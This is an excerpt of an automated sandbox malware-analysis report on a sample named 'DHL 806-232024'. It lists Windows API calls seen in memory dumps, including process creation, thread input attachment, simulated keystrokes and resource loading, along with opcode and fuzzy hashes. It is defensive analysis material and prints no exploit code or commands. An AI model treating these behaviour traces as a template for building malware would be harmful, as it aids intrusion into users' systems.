                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                  • API String ID: 1704125052-3381328864
                                                                                  • Opcode ID: acb8e61dea35252b6bb143b76d1e93f6ebb7c438d13fe359ca41106c0b00a68f
                                                                                  • Instruction ID: 9b85fdc53e51227ccee87ac7a825af1438f0b540e1b4abb5cc51f1ec4d3c5137
                                                                                  • Opcode Fuzzy Hash: acb8e61dea35252b6bb143b76d1e93f6ebb7c438d13fe359ca41106c0b00a68f
                                                                                  • Instruction Fuzzy Hash: 5111067624832BBAFA013635FC1ADB677DCDF05374F200026FE01E50D5FEA5A9505A59
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00948BEC
                                                                                  • CoInitialize.OLE32(00000000), ref: 00948C19
                                                                                  • CoUninitialize.OLE32 ref: 00948C23
                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00948D23
                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00948E50
                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00962C0C), ref: 00948E84
                                                                                  • CoGetObject.OLE32(?,00000000,00962C0C,?), ref: 00948EA7
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00948EBA
                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00948F3A
                                                                                  • VariantClear.OLEAUT32(?), ref: 00948F4A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 2395222682-0
                                                                                  • Opcode ID: 078895433c47e226ff48036c842008af77756b791e575afb498e5a9ab9a3a815
                                                                                  • Instruction ID: c7dd7df549d036c372a96f49be5f59a1f52041313a0dd576c23e1fea4b70dfa5
                                                                                  • Opcode Fuzzy Hash: 078895433c47e226ff48036c842008af77756b791e575afb498e5a9ab9a3a815
                                                                                  • Instruction Fuzzy Hash: 4FC1F071608305AFC700EF68C88492BB7E9FF89758F00496DF58A9B251DB71ED05CB52
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 0093419D
                                                                                  • __swprintf.LIBCMT ref: 009341AA
                                                                                    • Part of subcall function 008F38D8: __woutput_l.LIBCMT ref: 008F3931
                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 009341D4
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 009341E0
                                                                                  • LockResource.KERNEL32(00000000), ref: 009341ED
                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 0093420D
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0093421F
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0093422E
                                                                                  • LockResource.KERNEL32(?), ref: 0093423A
                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0093429B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                  • String ID:
                                                                                  • API String ID: 1433390588-0
                                                                                  • Opcode ID: 828cf22486969beb7b215c12728f09913f0611109d2ac4daf0654797829a7035
                                                                                  • Instruction ID: d5ec9c966c69c508ba9a08144c8d9f814ba61fc9e654edd14841ffbacc5aace1
                                                                                  • Opcode Fuzzy Hash: 828cf22486969beb7b215c12728f09913f0611109d2ac4daf0654797829a7035
                                                                                  • Instruction Fuzzy Hash: 2431CEB161920AABCB019FA1DC98EBF7BACEF04311F014425F925E2150E734EA519BA1
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00931700
                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00930778,?,00000001), ref: 00931714
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0093171B
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00930778,?,00000001), ref: 0093172A
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0093173C
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00930778,?,00000001), ref: 00931755
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00930778,?,00000001), ref: 00931767
                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00930778,?,00000001), ref: 009317AC
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00930778,?,00000001), ref: 009317C1
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00930778,?,00000001), ref: 009317CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: ebce8f2926d2f067824311399e85726aac33c8652ce7e7091e629443a7d3f328
                                                                                  • Instruction ID: ecb3554f25959df3e95443e7b7f5b3545a511ee1da2d63f6dcf8992f8f7a8c7a
                                                                                  • Opcode Fuzzy Hash: ebce8f2926d2f067824311399e85726aac33c8652ce7e7091e629443a7d3f328
                                                                                  • Instruction Fuzzy Hash: A331D175229308BBDB119F59EC84B7977EDEB05712F144025F802D62B0DB749D409F50
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008DFC06
                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 008DFCA5
                                                                                  • UnregisterHotKey.USER32(?), ref: 008DFDFC
                                                                                  • DestroyWindow.USER32(?), ref: 00914A00
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00914A65
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00914A92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 469580280-3243417748
                                                                                  • Opcode ID: fb25c7e42c3ff76d52a0c16ab991eb7941b2440abb08172edc0fecd67e53f14e
                                                                                  • Instruction ID: 045412f97ded9cc562f4f9e51cad1458d5bf8c1480acc2583d1d4e6037401576
                                                                                  • Opcode Fuzzy Hash: fb25c7e42c3ff76d52a0c16ab991eb7941b2440abb08172edc0fecd67e53f14e
                                                                                  • Instruction Fuzzy Hash: 47A16A307012268FCB29EF15C494B69F768FF08710F1542AEE90AEB262DB30AD56DF55
                                                                                  APIs
                                                                                  • EnumChildWindows.USER32(?,0092AA64), ref: 0092A9A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChildEnumWindows
                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                  • API String ID: 3555792229-1603158881
                                                                                  • Opcode ID: bd93683d849f9ed978cf999d048015944d4de255d329cca0d1264eb31e06d844
                                                                                  • Instruction ID: 478fc39edc082877840723c54fcc61787560e1a157895c08a639b7b1f05c0c38
                                                                                  • Opcode Fuzzy Hash: bd93683d849f9ed978cf999d048015944d4de255d329cca0d1264eb31e06d844
                                                                                  • Instruction Fuzzy Hash: 7B91C53190061ADBCB18EF74D481BF9FB78FF04304F508129D98AE7245DB306999CBA2
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 008D2EAE
                                                                                    • Part of subcall function 008D1DB3: GetClientRect.USER32(?,?), ref: 008D1DDC
                                                                                    • Part of subcall function 008D1DB3: GetWindowRect.USER32(?,?), ref: 008D1E1D
                                                                                    • Part of subcall function 008D1DB3: ScreenToClient.USER32(?,?), ref: 008D1E45
                                                                                  • GetDC.USER32 ref: 0090CF82
                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0090CF95
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0090CFA3
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0090CFB8
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0090CFC0
                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0090D04B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                  • String ID: U
                                                                                  • API String ID: 4009187628-3372436214
                                                                                  • Opcode ID: 6d8dc0140cbe3fa13fc4fbb30fb7877f36be43c70e4169a9e6af1ca4cb3029b9
                                                                                  • Instruction ID: 961702889541f84b5b191a63f341b3418c1501f192eca46db7057a2f2274e96d
                                                                                  • Opcode Fuzzy Hash: 6d8dc0140cbe3fa13fc4fbb30fb7877f36be43c70e4169a9e6af1ca4cb3029b9
                                                                                  • Instruction Fuzzy Hash: 9871F771500205EFCF21DF64C884ABA7BBAFF48364F14436AED55962A6C7318C41DF61
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                    • Part of subcall function 008D2344: GetCursorPos.USER32(?), ref: 008D2357
                                                                                    • Part of subcall function 008D2344: ScreenToClient.USER32(009967B0,?), ref: 008D2374
                                                                                    • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000001), ref: 008D2399
                                                                                    • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000002), ref: 008D23A7
                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0095C2E4
                                                                                  • ImageList_EndDrag.COMCTL32 ref: 0095C2EA
                                                                                  • ReleaseCapture.USER32 ref: 0095C2F0
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 0095C39A
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0095C3AD
                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0095C48F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                  • API String ID: 1924731296-2107944366
                                                                                  • Opcode ID: 5bf77cbc98ae4fcb4243e979c00f46dd3fd4dbda093c5601b731ba0166d97e9e
                                                                                  • Instruction ID: 899a608f590157710c59053d066ed3a72878f22ec76e83f5c6dba2a8c8d4bbaa
                                                                                  • Opcode Fuzzy Hash: 5bf77cbc98ae4fcb4243e979c00f46dd3fd4dbda093c5601b731ba0166d97e9e
                                                                                  • Instruction Fuzzy Hash: 3051AC70218304AFDB10EF29C855F6A7BE5FB88315F04462EF9918B2F1DB30A949DB52
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0095F910), ref: 0094903D
                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0095F910), ref: 00949071
                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009491EB
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00949215
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                  • String ID:
                                                                                  • API String ID: 560350794-0
                                                                                  • Opcode ID: 9d79744ca6f3adecdaacf92b328aea0bd64b434ee19213575cde950d4efddd39
                                                                                  • Instruction ID: a81db9a925529c752259133bd0cd38fc69d2c2168b71b105461b4a38f6dfc96d
                                                                                  • Opcode Fuzzy Hash: 9d79744ca6f3adecdaacf92b328aea0bd64b434ee19213575cde950d4efddd39
                                                                                  • Instruction Fuzzy Hash: 93F15E71A00219EFCF04DF94C888EAEB7B9FF89315F108599F516AB290DB31AE45CB50
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0094F9C9
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094FB5C
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094FB80
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094FBC0
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094FBE2
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094FD5E
                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0094FD90
                                                                                  • CloseHandle.KERNEL32(?), ref: 0094FDBF
                                                                                  • CloseHandle.KERNEL32(?), ref: 0094FE36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4090791747-0
                                                                                  • Opcode ID: 30571ce5fbe075d6df13cbe27b1caccdd4ad2cc06e72ab7efe18567eb7eb3889
                                                                                  • Instruction ID: 121495971ebcfebcb5442164d39cc43aaff47e0b3b07ef03596793043ac130fb
                                                                                  • Opcode Fuzzy Hash: 30571ce5fbe075d6df13cbe27b1caccdd4ad2cc06e72ab7efe18567eb7eb3889
                                                                                  • Instruction Fuzzy Hash: 40E19031604242DFCB14EF28C4A1E6ABBE5FF85354F14896DF9998B2A2DB31DC44CB52
                                                                                  APIs
                                                                                    • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009338D3,?), ref: 009348C7
                                                                                    • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009338D3,?), ref: 009348E0
                                                                                    • Part of subcall function 00934CD3: GetFileAttributesW.KERNEL32(?,00933947), ref: 00934CD4
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00934FE2
                                                                                  • _wcscmp.LIBCMT ref: 00934FFC
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00935017
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 793581249-0
                                                                                  • Opcode ID: bb30ba51a860ceb9b443df61b2c5f636abda498feed874736df7af09c8bd4348
                                                                                  • Instruction ID: b4c50bdcbe11c0c65ee028c5686e57d7deef0a75c3695fdcaeb266a7fc17d04c
                                                                                  • Opcode Fuzzy Hash: bb30ba51a860ceb9b443df61b2c5f636abda498feed874736df7af09c8bd4348
                                                                                  • Instruction Fuzzy Hash: AB5144B200C7859BC724DBA4C8819DFB3ECEF85351F10492EB289D3151EE75A6888B67
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0095896E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: a876474d616032efb9acca0833c336be15d67839691ed61e03aac9b42109f9ea
                                                                                  • Instruction ID: f9272e586302fa8c9ed42c77e71df0da7148a5ad34dd4a689d83a89fdf97b9f1
                                                                                  • Opcode Fuzzy Hash: a876474d616032efb9acca0833c336be15d67839691ed61e03aac9b42109f9ea
                                                                                  • Instruction Fuzzy Hash: BE51B830504208BFDF20DF2ACC85B6B7B69FB05362F504516FE15F61A1DF71A9889B81
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0090C547
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090C569
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0090C581
                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0090C59F
                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0090C5C0
                                                                                  • DestroyIcon.USER32(00000000), ref: 0090C5CF
                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0090C5EC
                                                                                  • DestroyIcon.USER32(?), ref: 0090C5FB
                                                                                    • Part of subcall function 0095A71E: DeleteObject.GDI32(00000000), ref: 0095A757
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                  • String ID:
                                                                                  • API String ID: 2819616528-0
                                                                                  • Opcode ID: 338b2d15716b26450da098d74cb66cee294469527023786d9d74169ab2d94747
                                                                                  • Instruction ID: 97a4d28d8edf9acd4b9394f63f2704b5b0d65601ea685cebd5c64871c3cc249c
                                                                                  • Opcode Fuzzy Hash: 338b2d15716b26450da098d74cb66cee294469527023786d9d74169ab2d94747
                                                                                  • Instruction Fuzzy Hash: 5F514974614209EFDB20DF25DC45BAA77B9FB58361F10062AF902D72A0DBB0ED90EB50
                                                                                  APIs
                                                                                    • Part of subcall function 0092AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092AE77
                                                                                    • Part of subcall function 0092AE57: GetCurrentThreadId.KERNEL32 ref: 0092AE7E
                                                                                    • Part of subcall function 0092AE57: AttachThreadInput.USER32(00000000,?,00929B65,?,00000001), ref: 0092AE85
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00929B70
                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00929B8D
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00929B90
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00929B99
                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00929BB7
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00929BBA
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00929BC3
                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00929BDA
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00929BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2014098862-0
                                                                                  • Opcode ID: 0635da8eb403e9a0775220dd9e7c5e857e046fe30d097a0645dab02f31ad4b2f
                                                                                  • Instruction ID: 9a4e637aa9830d14c9d30b79b06e948a8ecc605ff1999cb11e36366a086dead2
                                                                                  • Opcode Fuzzy Hash: 0635da8eb403e9a0775220dd9e7c5e857e046fe30d097a0645dab02f31ad4b2f
